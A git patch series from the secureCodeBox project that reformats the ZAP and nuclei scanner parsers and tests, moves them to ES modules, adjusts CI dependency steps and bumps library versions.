"automation.yaml" - }], + [ + { + name: "zap-automation-framework-petstore", + mountPath: "/home/securecodebox/scb-automation/automation.yaml", + subPath: "automation.yaml", + }, + ], ); // There must be at least one finding expect(count).toBeGreaterThanOrEqual(1); }, - 60 * 8 * 1000 + 60 * 8 * 1000, ); test.concurrent( @@ -65,21 +73,25 @@ test.concurrent( ["-autorun", "/home/securecodebox/scb-automation/automation.yaml"], 60 * 31 * 1000, // volumes - [{ - "name": "zap-automation-framework-nginx", - "configMap": {"name": "zap-automation-framework-nginx"} - }], + [ + { + name: "zap-automation-framework-nginx", + configMap: { name: "zap-automation-framework-nginx" }, + }, + ], // volumeMounts - [{ - "name": "zap-automation-framework-nginx", - "mountPath": "/home/securecodebox/scb-automation/automation.yaml", - "subPath": "automation.yaml" - }], + [ + { + name: "zap-automation-framework-nginx", + mountPath: "/home/securecodebox/scb-automation/automation.yaml", + subPath: "automation.yaml", + }, + ], ); expect(count).toBeGreaterThanOrEqual(4); }, - 60 * 8 * 1000 + 60 * 8 * 1000, ); test.concurrent( @@ -91,19 +103,23 @@ test.concurrent( ["-autorun", "/home/securecodebox/scb-automation/automation.yaml"], 60 * 31 * 1000, // volumes - [{ - "name": "zap-automation-framework-juicehop", - "configMap": {"name": "zap-automation-framework-juicehop"} - }], + [ + { + name: "zap-automation-framework-juicehop", + configMap: { name: "zap-automation-framework-juicehop" }, + }, + ], // volumeMounts - [{ - "name": "zap-automation-framework-juicehop", - "mountPath": "/home/securecodebox/scb-automation/automation.yaml", - "subPath": "automation.yaml" - }], + [ + { + name: "zap-automation-framework-juicehop", + mountPath: "/home/securecodebox/scb-automation/automation.yaml", + subPath: "automation.yaml", + }, + ], ); expect(count).toBeGreaterThanOrEqual(4); }, - 60 * 8 * 1000 -); \ No newline at end of file + 60 * 8 * 1000, +); diff --git a/scanners/zap-automation-framework/parser/parser.test.js b/scanners/zap-automation-framework/parser/parser.test.js index e0ef8e4672..f04b82a0c0 100644 --- a/scanners/zap-automation-framework/parser/parser.test.js +++ b/scanners/zap-automation-framework/parser/parser.test.js @@ -14,7 +14,7 @@ test("Parsing the juice-shop results.", async () => { __dirname + "/__testFiles__/juice-shop.xml", { encoding: "utf8", - } + }, ); const findings = await parse(fileContent); @@ -27,7 +27,7 @@ test("Parsing the example.com results.", async () => { __dirname + "/__testFiles__/example.com.xml", { encoding: "utf8", - } + }, ); const findings = await parse(fileContent); @@ -40,7 +40,7 @@ test("Parsing the docs.securecodebox.io results.", async () => { __dirname + "/__testFiles__/docs.securecodebox.io.xml", { encoding: "utf8", - } + }, ); const findings = await parse(fileContent); @@ -53,7 +53,7 @@ test("Parsing an empty result.", async () => { __dirname + "/__testFiles__/not-found.xml", { encoding: "utf8", - } + }, ); const findings = await parse(fileContent); @@ -79,4 +79,4 @@ test("Parsing a bodgeit result.", async () => { const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchSnapshot(); -}); \ No newline at end of file +}); From 33f7aa4575d25375663abae810128304ca634e83 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:15:44 +0200 Subject: [PATCH 007/137] Update zap to esm Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 2 +- .../zap-automation-framework.test.js | 22 ++++++-- .../parser/package-lock.json | 15 +++--- .../parser/package.json | 5 +- .../zap-automation-framework/parser/parser.js | 54 ++++++++++--------- .../parser/parser.test.js | 34 ++++++------ 6 files changed, 77 insertions(+), 55 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 795c6e3f48..1b050f4037 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -436,7 +436,7 @@ jobs: # - trivy-sbom # - whatweb # - wpscan - # - zap-automation-framework + - zap-automation-framework steps: - name: Checkout uses: actions/checkout@v4 diff --git a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js index 361f82f98e..376a7259b2 100644 --- a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js +++ b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); +import { scan } from "../../../tests/integration/helpers.js"; test.concurrent( "zap automation scan without config against 'bodgeit' should only find couple findings", @@ -31,7 +31,10 @@ test.concurrent( // There must be at least one finding expect(count).toBeGreaterThanOrEqual(1); }, - 60 * 8 * 1000, + { + timeout: 60 * 8 * 1000, + retry: 3, + }, ); test.concurrent( @@ -61,7 +64,10 @@ test.concurrent( // There must be at least one finding expect(count).toBeGreaterThanOrEqual(1); }, - 60 * 8 * 1000, + { + timeout: 60 * 8 * 1000, + retry: 3, + }, ); test.concurrent( @@ -91,7 +97,10 @@ test.concurrent( expect(count).toBeGreaterThanOrEqual(4); }, - 60 * 8 * 1000, + { + timeout: 60 * 8 * 1000, + retry: 3, + }, ); test.concurrent( @@ -121,5 +130,8 @@ test.concurrent( expect(count).toBeGreaterThanOrEqual(4); }, - 60 * 8 * 1000, + { + timeout: 60 * 8 * 1000, + retry: 3, + }, ); diff --git a/scanners/zap-automation-framework/parser/package-lock.json b/scanners/zap-automation-framework/parser/package-lock.json index 505a6c4637..d95f4d94ee 100644 --- a/scanners/zap-automation-framework/parser/package-lock.json +++ b/scanners/zap-automation-framework/parser/package-lock.json @@ -9,7 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "xml2js": "^0.5.0" + "xml2js": "^0.6.2" }, "devDependencies": {} }, @@ -19,9 +19,10 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "node_modules/xml2js": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.5.0.tgz", - "integrity": "sha512-drPFnkQJik/O+uPKpqSgr22mpuFHqKdbS835iAQrUC73L2F5WkboIRd63ai/2Yg6I1jzifPFKH2NTK+cfglkIA==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", + "license": "MIT", "dependencies": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" @@ -46,9 +47,9 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "xml2js": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.5.0.tgz", - "integrity": "sha512-drPFnkQJik/O+uPKpqSgr22mpuFHqKdbS835iAQrUC73L2F5WkboIRd63ai/2Yg6I1jzifPFKH2NTK+cfglkIA==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", "requires": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" diff --git a/scanners/zap-automation-framework/parser/package.json b/scanners/zap-automation-framework/parser/package.json index 6e3367e3f0..55c4beb67e 100644 --- a/scanners/zap-automation-framework/parser/package.json +++ b/scanners/zap-automation-framework/parser/package.json @@ -3,12 +3,13 @@ "version": "1.0.0", "description": "Parses result files for the type: 'zap-xml'", "main": "", + "type": "module", "scripts": {}, "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "xml2js": "^0.5.0" + "xml2js": "^0.6.2" }, "devDependencies": {} -} +} \ No newline at end of file diff --git a/scanners/zap-automation-framework/parser/parser.js b/scanners/zap-automation-framework/parser/parser.js index fecb960bd2..adb9084d81 100644 --- a/scanners/zap-automation-framework/parser/parser.js +++ b/scanners/zap-automation-framework/parser/parser.js @@ -1,7 +1,7 @@ // SPDX-FileCopyrightText: the secureCodeBox authors // // SPDX-License-Identifier: Apache-2.0 -const xml2js = require("xml2js"); +import { parseStringPromise } from "xml2js"; function riskToSeverity(risk) { switch (parseInt(risk, 10)) { @@ -51,30 +51,36 @@ function normalizeXmlObject(rawAlert = {}) { } function createFindingFromAlert(alert, { location, host, port }) { - let findingUrls = [] - if(Array.isArray(alert.instances.instance)) { + let findingUrls = []; + if (Array.isArray(alert.instances.instance)) { findingUrls = alert.instances.instance.map(normalizeXmlObject); } - const urlList = alert.reference.split('

').filter(item => item !== '').map(item => stripHtmlTags(item)); - const urlReferences = urlList.map(element => ({ + const urlList = alert.reference + .split("

") + .filter((item) => item !== "") + .map((item) => stripHtmlTags(item)); + const urlReferences = urlList.map((element) => ({ type: "URL", value: element, })); - - const cweReferences = (alert.cweid !== '-1' && alert.cweid !== undefined) ? [ - { - type: "CWE", - value: "CWE-" + alert.cweid, - }, - { - type: "URL", - value: "https://cwe.mitre.org/data/definitions/" + alert.cweid + ".html", - }, - ] : []; - + + const cweReferences = + alert.cweid !== "-1" && alert.cweid !== undefined + ? [ + { + type: "CWE", + value: "CWE-" + alert.cweid, + }, + { + type: "URL", + value: + "https://cwe.mitre.org/data/definitions/" + alert.cweid + ".html", + }, + ] + : []; + const references = [...urlReferences, ...cweReferences]; - return { name: stripHtmlTags(alert.name), @@ -94,20 +100,20 @@ function createFindingFromAlert(alert, { location, host, port }) { zap_solution: stripHtmlTags(alert.solution) || null, zap_otherinfo: truncate({ text: stripHtmlTags(alert.otherinfo) || null, - maxLength: 2048 + maxLength: 2048, }), zap_reference: stripHtmlTags(alert.reference) || null, zap_cweid: alert.cweid || null, zap_wascid: alert.wascid || null, zap_riskcode: alert.riskcode || null, zap_pluginid: alert.pluginid || null, - zap_finding_urls: findingUrls - } + zap_finding_urls: findingUrls, + }, }; } -async function parse(fileContent) { - const { OWASPZAPReport } = await xml2js.parseStringPromise(fileContent); +export async function parse(fileContent) { + const { OWASPZAPReport } = await parseStringPromise(fileContent); const findings = []; @@ -124,5 +130,3 @@ async function parse(fileContent) { return findings; } - -module.exports.parse = parse; diff --git a/scanners/zap-automation-framework/parser/parser.test.js b/scanners/zap-automation-framework/parser/parser.test.js index f04b82a0c0..204340d49c 100644 --- a/scanners/zap-automation-framework/parser/parser.test.js +++ b/scanners/zap-automation-framework/parser/parser.test.js @@ -2,16 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("Parsing the juice-shop results.", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/juice-shop.xml", + import.meta.dirname + "/__testFiles__/juice-shop.xml", { encoding: "utf8", }, @@ -24,7 +22,7 @@ test("Parsing the juice-shop results.", async () => { test("Parsing the example.com results.", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/example.com.xml", + import.meta.dirname + "/__testFiles__/example.com.xml", { encoding: "utf8", }, @@ -37,7 +35,7 @@ test("Parsing the example.com results.", async () => { test("Parsing the docs.securecodebox.io results.", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/docs.securecodebox.io.xml", + import.meta.dirname + "/__testFiles__/docs.securecodebox.io.xml", { encoding: "utf8", }, @@ -50,7 +48,7 @@ test("Parsing the docs.securecodebox.io results.", async () => { test("Parsing an empty result.", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/not-found.xml", + import.meta.dirname + "/__testFiles__/not-found.xml", { encoding: "utf8", }, @@ -62,9 +60,12 @@ test("Parsing an empty result.", async () => { }); test("Parsing a nginx result.", async () => { - const fileContent = await readFile(__dirname + "/__testFiles__/nginx.xml", { - encoding: "utf8", - }); + const fileContent = await readFile( + import.meta.dirname + "/__testFiles__/nginx.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -72,9 +73,12 @@ test("Parsing a nginx result.", async () => { }); test("Parsing a bodgeit result.", async () => { - const fileContent = await readFile(__dirname + "/__testFiles__/bodgeit.xml", { - encoding: "utf8", - }); + const fileContent = await readFile( + import.meta.dirname + "/__testFiles__/bodgeit.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); From 73013cac0a1f38c32b0d31f639fa89feb3aa8476 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:16:43 +0200 Subject: [PATCH 008/137] Correct path for package.json location Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 1b050f4037..746ca50aea 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -481,7 +481,7 @@ jobs: - name: Install Dependencies working-directory: ./scanners/${{ matrix.unit }}/ #install dependencies for the parser if the directory has a package.json - if: exists('./scanners/${{ matrix.unit }}/package.json') + if: exists('./scanners/${{ matrix.unit }}/parser/package.json') run: bun install - name: Unit Tests From f89a3fe46c63967459f61a593000bcf316d80ded Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:18:47 +0200 Subject: [PATCH 009/137] Remove uneeded package managment files Nuclei parser has no dependencies, having them is not required and doesn't do anything Signed-off-by: Jannik Hollenbach --- scanners/nuclei/parser/package-lock.json | 14 -------------- scanners/nuclei/parser/package-lock.json.license | 3 --- scanners/nuclei/parser/package.json | 11 ----------- scanners/nuclei/parser/package.json.license | 3 --- 4 files changed, 31 deletions(-) delete mode 100644 scanners/nuclei/parser/package-lock.json delete mode 100644 scanners/nuclei/parser/package-lock.json.license delete mode 100644 scanners/nuclei/parser/package.json delete mode 100644 scanners/nuclei/parser/package.json.license diff --git a/scanners/nuclei/parser/package-lock.json b/scanners/nuclei/parser/package-lock.json deleted file mode 100644 index fe8dce1077..0000000000 --- a/scanners/nuclei/parser/package-lock.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "name": "@securecodebox/parser-nuclei", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/parser-nuclei", - "version": "1.0.0", - "license": "Apache-2.0", - "devDependencies": {} - } - } -} diff --git a/scanners/nuclei/parser/package-lock.json.license b/scanners/nuclei/parser/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/nuclei/parser/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/nuclei/parser/package.json b/scanners/nuclei/parser/package.json deleted file mode 100644 index e99146c1ea..0000000000 --- a/scanners/nuclei/parser/package.json +++ /dev/null @@ -1,11 +0,0 @@ -{ - "name": "@securecodebox/parser-nuclei", - "version": "1.0.0", - "description": "Parses result files for the type: 'nuclei-jsonl'.", - "main": "", - "scripts": {}, - "keywords": [], - "author": "iteratec GmbH", - "license": "Apache-2.0", - "devDependencies": {} -} diff --git a/scanners/nuclei/parser/package.json.license b/scanners/nuclei/parser/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/nuclei/parser/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 From f6bacb9d6cd8a86c5a5d6a3c4d7922b8a7ce534e Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:19:14 +0200 Subject: [PATCH 010/137] Reformat w/ prettier Signed-off-by: Jannik Hollenbach --- .../nuclei/integration-tests/nuclei.test.js | 17 ++-- scanners/nuclei/parser/parser.js | 40 +++++----- scanners/nuclei/parser/parser.test.js | 79 +++++++++---------- 3 files changed, 70 insertions(+), 66 deletions(-) diff --git a/scanners/nuclei/integration-tests/nuclei.test.js b/scanners/nuclei/integration-tests/nuclei.test.js index df145cbbc5..44953158af 100644 --- a/scanners/nuclei/integration-tests/nuclei.test.js +++ b/scanners/nuclei/integration-tests/nuclei.test.js @@ -12,15 +12,22 @@ test( const { categories, severities, count } = await scan( "nuclei-bodgeit", "nuclei", - ["-no-interactsh", "-template-id", "http-missing-security-headers,tomcat-detect", - "-u", "http://bodgeit.demo-targets.svc.cluster.local:8080"], - 180 + [ + "-no-interactsh", + "-template-id", + "http-missing-security-headers,tomcat-detect", + "-u", + "http://bodgeit.demo-targets.svc.cluster.local:8080", + ], + 180, ); expect(count).toBeGreaterThanOrEqual(10); expect(severities["informational"]).toBeGreaterThanOrEqual(10); - expect(categories["http-missing-security-headers"]).toBeGreaterThanOrEqual(8); + expect(categories["http-missing-security-headers"]).toBeGreaterThanOrEqual( + 8, + ); expect(categories["tomcat-detect"]).toBe(1); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/nuclei/parser/parser.js b/scanners/nuclei/parser/parser.js index 46c6631949..c85ca4af7a 100644 --- a/scanners/nuclei/parser/parser.js +++ b/scanners/nuclei/parser/parser.js @@ -12,43 +12,45 @@ async function parse(fileContent) { return jsonResult.map((finding) => { const hostname = parseHostname(finding.host); - // Add reference URLs to the references array - const urlReferences = finding.info.reference ? finding.info.reference.flatMap(url => ({ - type: "URL", - value: url - })) : []; + // Add reference URLs to the references array + const urlReferences = finding.info.reference + ? finding.info.reference.flatMap((url) => ({ + type: "URL", + value: url, + })) + : []; // Add CWE reference to the references array const cweIds = finding?.info?.classification?.["cwe-id"] ?? []; - const cweReferences = cweIds.flatMap(cweId => [ + const cweReferences = cweIds.flatMap((cweId) => [ { type: "CWE", - value: cweId.toUpperCase() + value: cweId.toUpperCase(), }, { type: "URL", - value: `https://cwe.mitre.org/data/definitions/${cweId}.html` - } + value: `https://cwe.mitre.org/data/definitions/${cweId}.html`, + }, ]); - + // Add CVE reference to the references array const cveIds = finding?.info?.classification?.["cve-id"] ?? []; - const cveReferences = cveIds.flatMap(cveId => [ + const cveReferences = cveIds.flatMap((cveId) => [ { type: "CVE", - value: cveId.toUpperCase() + value: cveId.toUpperCase(), }, { type: "URL", - value: `https://nvd.nist.gov/vuln/detail/${cveId}` - } + value: `https://nvd.nist.gov/vuln/detail/${cveId}`, + }, ]); - - - + const references = [...urlReferences, ...cweReferences, ...cveReferences]; - const timestamp = finding.timestamp ? new Date(finding.timestamp).toISOString() : null; + const timestamp = finding.timestamp + ? new Date(finding.timestamp).toISOString() + : null; return { name: finding.info.name, @@ -59,7 +61,7 @@ async function parse(fileContent) { location: finding.host, severity: getAdjustedSeverity(finding?.info?.severity.toUpperCase()), category: finding["template-id"], - references: references.length > 0 ? references : null, + references: references.length > 0 ? references : null, attributes: { ip_addresses: finding.ip ? [finding.ip] : [], type: finding.type || null, diff --git a/scanners/nuclei/parser/parser.test.js b/scanners/nuclei/parser/parser.test.js index 0360910106..50a1feb72a 100644 --- a/scanners/nuclei/parser/parser.test.js +++ b/scanners/nuclei/parser/parser.test.js @@ -10,13 +10,12 @@ const { const { parse } = require("./parser"); test("parses empty result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/empty-test.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + "/__testFiles__/empty-test.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -24,13 +23,12 @@ test("parses empty result correctly", async () => { }); test("parses the example.com result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/example-com-test.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + "/__testFiles__/example-com-test.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -38,13 +36,12 @@ test("parses the example.com result correctly", async () => { }); test.skip("parses ftp result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/ftp-test.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + "/__testFiles__/ftp-test.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -52,13 +49,12 @@ test.skip("parses ftp result correctly", async () => { }); test("parses secureCodeBox.io result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/secureCodeBox-test.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + "/__testFiles__/secureCodeBox-test.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -66,13 +62,12 @@ test("parses secureCodeBox.io result correctly", async () => { }); test("parses log4shell result correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/log4shell.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + "/__testFiles__/log4shell.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(JSON.parse(fileContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -80,13 +75,13 @@ test("parses log4shell result correctly", async () => { }); test("parses results with requests & responses correctly", async () => { - const fileContent = - await readFile( - __dirname + "/__testFiles__/example-com-only-misc-tags-with-incluce-rr.jsonl", - { - encoding: "utf8", - } - ) + const fileContent = await readFile( + __dirname + + "/__testFiles__/example-com-only-misc-tags-with-incluce-rr.jsonl", + { + encoding: "utf8", + }, + ); const findings = await parse(JSON.parse(fileContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); From f0c40b107904272d28d0d0fa1521b893e126233e Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:21:06 +0200 Subject: [PATCH 011/137] Update nuclei to esm Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 2 +- .../nuclei/integration-tests/nuclei.test.js | 11 +++++----- scanners/nuclei/parser/parser.js | 4 +--- scanners/nuclei/parser/parser.test.js | 20 +++++++++---------- 4 files changed, 17 insertions(+), 20 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 746ca50aea..18d5b67984 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -427,7 +427,7 @@ jobs: # - ncrack # - nikto - nmap - # - nuclei + - nuclei # - screenshooter # - semgrep # - ssh-audit diff --git a/scanners/nuclei/integration-tests/nuclei.test.js b/scanners/nuclei/integration-tests/nuclei.test.js index 44953158af..695972ba4b 100644 --- a/scanners/nuclei/integration-tests/nuclei.test.js +++ b/scanners/nuclei/integration-tests/nuclei.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( - "Nuclei scan for a vulnerable bodgeit demo target", + "nuclei scan for a vulnerable bodgeit demo target", async () => { const { categories, severities, count } = await scan( "nuclei-bodgeit", @@ -29,5 +27,8 @@ test( ); expect(categories["tomcat-detect"]).toBe(1); }, - 3 * 60 * 1000, + { + timeout: 3 * 60 * 1000, + retry: 3, + }, ); diff --git a/scanners/nuclei/parser/parser.js b/scanners/nuclei/parser/parser.js index c85ca4af7a..70afd5fc44 100644 --- a/scanners/nuclei/parser/parser.js +++ b/scanners/nuclei/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { // Only 0 when the target wasn't reachable if (fileContent.length === 0) { return []; @@ -133,5 +133,3 @@ function readJsonLines(jsonl) { return []; } } - -module.exports.parse = parse; diff --git a/scanners/nuclei/parser/parser.test.js b/scanners/nuclei/parser/parser.test.js index 50a1feb72a..0577551233 100644 --- a/scanners/nuclei/parser/parser.test.js +++ b/scanners/nuclei/parser/parser.test.js @@ -2,16 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("parses empty result correctly", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/empty-test.jsonl", + import.meta.dirname + "/__testFiles__/empty-test.jsonl", { encoding: "utf8", }, @@ -24,7 +22,7 @@ test("parses empty result correctly", async () => { test("parses the example.com result correctly", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/example-com-test.jsonl", + import.meta.dirname + "/__testFiles__/example-com-test.jsonl", { encoding: "utf8", }, @@ -37,7 +35,7 @@ test("parses the example.com result correctly", async () => { test.skip("parses ftp result correctly", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/ftp-test.jsonl", + import.meta.dirname + "/__testFiles__/ftp-test.jsonl", { encoding: "utf8", }, @@ -50,7 +48,7 @@ test.skip("parses ftp result correctly", async () => { test("parses secureCodeBox.io result correctly", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/secureCodeBox-test.jsonl", + import.meta.dirname + "/__testFiles__/secureCodeBox-test.jsonl", { encoding: "utf8", }, @@ -63,7 +61,7 @@ test("parses secureCodeBox.io result correctly", async () => { test("parses log4shell result correctly", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/log4shell.jsonl", + import.meta.dirname + "/__testFiles__/log4shell.jsonl", { encoding: "utf8", }, @@ -76,7 +74,7 @@ test("parses log4shell result correctly", async () => { test("parses results with requests & responses correctly", async () => { const fileContent = await readFile( - __dirname + + import.meta.dirname + "/__testFiles__/example-com-only-misc-tags-with-incluce-rr.jsonl", { encoding: "utf8", From 390ed58b7dab3c5130751329d1dce6d78133d165 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:26:15 +0200 Subject: [PATCH 012/137] Properly correct directory for dependency install Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 18d5b67984..4ccdaed368 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -479,7 +479,7 @@ jobs: run: bun install - name: Install Dependencies - working-directory: ./scanners/${{ matrix.unit }}/ + working-directory: ./scanners/${{ matrix.unit }}/parser/ #install dependencies for the parser if the directory has a package.json if: exists('./scanners/${{ matrix.unit }}/parser/package.json') run: bun install From e9a1fe5c74a1df62f10b873036a804f5aa0ae04d Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:28:21 +0200 Subject: [PATCH 013/137] Reformat w/ prettier and minor package bump Signed-off-by: Jannik Hollenbach --- .../amass/integration-tests/amass.test.js | 4 +- scanners/amass/parser/package-lock.json | 595 +++++++++++++----- scanners/amass/parser/package.json | 6 +- scanners/amass/parser/parser.js | 2 +- scanners/amass/parser/parser.test.js | 12 +- 5 files changed, 445 insertions(+), 174 deletions(-) diff --git a/scanners/amass/integration-tests/amass.test.js b/scanners/amass/integration-tests/amass.test.js index ce59c17276..e611fa18a2 100644 --- a/scanners/amass/integration-tests/amass.test.js +++ b/scanners/amass/integration-tests/amass.test.js @@ -12,9 +12,9 @@ test( "amass-scanner-dummy-scan", "amass", ["-norecursive", "-timeout", "1", "-d", "owasp.org"], - 180 + 180, ); expect(count).toBeGreaterThanOrEqual(100); // The scan is passive, so we can expect a lot of subdomains }, - 10 * 60 * 1000 + 10 * 60 * 1000, ); diff --git a/scanners/amass/parser/package-lock.json b/scanners/amass/parser/package-lock.json index e007533934..aeae45de77 100644 --- a/scanners/amass/parser/package-lock.json +++ b/scanners/amass/parser/package-lock.json @@ -9,7 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "sqlite3": "^5.1.6" + "sqlite3": "^5.1.7" }, "devDependencies": {} }, @@ -19,25 +19,6 @@ "integrity": "sha512-k2Ty1JcVojjJFwrg/ThKi2ujJ7XNLYaFGNB/bWT9wGR+oSMJHMa5w+CUq6p/pVrKeNNgA7pCqEcjSnHVoqJQFw==", "optional": true }, - "node_modules/@mapbox/node-pre-gyp": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/@mapbox/node-pre-gyp/-/node-pre-gyp-1.0.11.tgz", - "integrity": "sha512-Yhlar6v9WQgUp/He7BdgzOz8lqMQ8sU+jkCq7Wx8Myc5YFJLbEe7lgui/V7G1qB1DJykHSGwreceSaD60Y0PUQ==", - "dependencies": { - "detect-libc": "^2.0.0", - "https-proxy-agent": "^5.0.0", - "make-dir": "^3.1.0", - "node-fetch": "^2.6.7", - "nopt": "^5.0.0", - "npmlog": "^5.0.1", - "rimraf": "^3.0.2", - "semver": "^7.3.5", - "tar": "^6.1.11" - }, - "bin": { - "node-pre-gyp": "bin/node-pre-gyp" - } - }, "node_modules/@npmcli/fs": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/@npmcli/fs/-/fs-1.1.1.tgz", @@ -74,12 +55,14 @@ "node_modules/abbrev": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-1.1.1.tgz", - "integrity": 